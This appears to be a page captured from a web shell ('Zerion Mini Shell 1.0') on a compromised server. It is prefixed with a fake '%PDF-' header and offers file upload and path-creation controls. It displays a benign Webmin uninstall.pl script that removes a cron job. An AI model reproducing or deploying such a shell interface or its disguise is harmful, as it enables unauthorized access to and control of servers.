%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/share/webmin/time/
Upload File :
Create Path :
Current File : //usr/share/webmin/time/uninstall.pl

# uninstall.pl
# Called when webmin is uninstalled

use strict;
use warnings;
require 'time-lib.pl';

sub module_uninstall
{
# Remove the cron job for scheduled checking
&foreign_require("cron");
my $job = &find_cron_job();
if ($job) {
	&cron::delete_cron_job($job);
	}
}

1;


Zerion Mini Shell 1.0